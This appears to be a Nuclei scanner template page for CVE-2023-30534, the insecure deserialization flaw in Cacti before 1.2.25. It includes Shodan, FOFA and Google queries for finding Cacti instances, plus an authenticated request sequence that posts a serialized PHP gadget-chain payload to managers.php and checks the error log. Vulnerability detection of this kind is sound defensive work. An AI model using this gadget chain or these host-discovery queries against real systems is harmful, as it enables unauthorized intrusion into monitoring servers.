Cacti < 1.2.25 Insecure Deserialization
ID: CVE-2023-30534
Severity: medium
Author: k0pak4
Tags: cve,cve2023,cacti,authenticated
Description
Section titled “Description”Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
YAML Source
Section titled “YAML Source”id: CVE-2023-30534
info: name: Cacti < 1.2.25 Insecure Deserialization author: k0pak4 severity: medium description: | Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24. remediation: This issue has been addressed in version 1.2.25. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p - https://nvd.nist.gov/vuln/detail/CVE-2023-30534 - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25 - https://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/ - https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2023-30534 cwe-id: CWE-502 epss-score: 0.09326 epss-percentile: 0.94688 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: cacti product: cacti shodan-query: - title:"Cacti" - http.title:"login to cacti" - http.title:"cacti" - http.favicon.hash:"-1797138069" fofa-query: - icon_hash="-1797138069" - title="cacti" - title="login to cacti" google-query: - intitle:"cacti" - intitle:"login to cacti" tags: cve,cve2023,cacti,authenticated
http: - raw: - | GET /index.php HTTP/1.1 Host: {{Hostname}}
- | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
- | POST /managers.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
- | GET /clog.php HTTP/1.1 Host: {{Hostname}}
cookie-reuse: true matchers-condition: and matchers: - type: regex part: body_4 regex: - "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)" condition: and
- type: status status: - 200
extractors: - type: regex name: csrf_token part: body group: 1 regex: - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]" internal: true# digest: 4a0a0047304502205779d8cacc5f17ed58393019973a9a45a48b3cfb1a25855ff45a418df488a8da022100bc5d611c9ab4ab9e19215d3385b02984f8ce910412a01c0d691a4d6586ba0715:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30534.yaml"